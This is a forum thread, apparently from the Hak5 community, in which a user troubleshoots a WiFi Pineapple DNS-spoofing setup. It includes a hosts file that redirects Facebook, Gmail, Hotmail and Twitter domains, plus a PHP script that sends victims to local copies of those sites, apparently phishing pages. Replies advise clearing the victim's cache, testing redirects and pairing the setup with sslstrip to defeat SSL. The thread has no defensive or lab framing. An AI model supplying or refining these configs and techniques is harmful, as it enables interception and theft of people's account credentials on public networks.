daniboy92 Posted July 11, 2014

Hi,

After trying and trying to get a working dnsspoof service, I have it. Now I'm trying to spoof multiple websites (facebook, twitter, gmail, hotmail, ebay... etc), but I can only spoof one; it only works with Facebook... Is there code in browsers or the OS that blocks spoofing web pages?

This is my dnsspoof's hosts file:

```
172.16.42.1 example.com
172.16.42.1 *.facebook.*
172.16.42.1 *.gmail.*
172.16.42.1 *.hotmail.*
172.16.42.1 *.twitter.*
```

And this is my redirect file:

```php
<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

if (strpos($ref, "example")){
    header('Status: 302 Found');
    header('Location: example.html');
}
if (strpos($ref, "facebook")){
    header('Status: 302 Found');
    header('Location: facebookES');
}
if (strpos($ref, "gmail")){
    header('Status: 302 Found');
    header('Location: gmailES');
}
if (strpos($ref, "hotmail")){
    header('Status: 302 Found');
    header('Location: hotmailES');
}
if (strpos($ref, "twitter")){
    header('Status: 302 Found');
    header('Location: twitterES');
}
require('error.php');
?>
```

The files aren't htm or html, they are shortcuts to the real htm files... But this is not the problem. I don't know if there is something wrong in my Redirect.php file, my hosts file, or if it's a problem that prevents the pineapple from spoofing various websites at the same time...

GnomeProgramming Posted July 11, 2014

Try to clean the browser cache of the victim machine and try again. Sometimes this happens to me when the SSL connection is already established before I start dnsspoof.

Good luck~

daniboy92 Posted July 11, 2014

> Try to clean the browser cache of the victim machine and try again. Sometimes this happens to me when the SSL connection is already established before I start dnsspoof. Good luck~

I deleted everything: cookies, cache, history, downloads... Everything I can clean in the browser... But I can only spoof Facebook.com and example.com

GnomeProgramming Posted July 11, 2014

Try this:

```php
if (strpos($ref, "gmail")){
    header('Status: 302 Found');
    header('Location: http://www.yolo.com');
}
```

And if it doesn't work, try to redirect a website that doesn't use SSL OR/AND try this: https://forums.hak5.org/index.php?/topic/32982-dnsspoof-doesnt-redirect/?p=246490

daniboy92 Posted July 13, 2014

Ok, I tried this:

```php
if (strpos($ref, "gmail")){
    header('Status: 302 Found');
    header('Location: http://www.yolo.com');
}
```

It doesn't work with gmail, but works fine with marca.com... I think it's because gmail uses SSL. Does someone know how to use sslstrip with dnsspoof?

daniboy92 Posted July 16, 2014

Can someone make a tutorial for using dnsspoof and sslstrip at the same time?

cheeto Posted July 16, 2014

sslstrip isn't very effective anymore due to HSTS. As far as I know it doesn't work with: Gmail, Yahoo Mail, Hotmail. Last time I tried, it did work with Facebook though.

A video tutorial would be more than welcome though.

daniboy92 Posted July 16, 2014

Thanks cheeto, but I can't spoof websites with SSL protection. I want to remove SSL with sslstrip and try to spoof them. Personally I can't spoof websites like Gmail, Hotmail, PayPal, Ebay... Only Facebook, which uses SSL. Tell me if you can.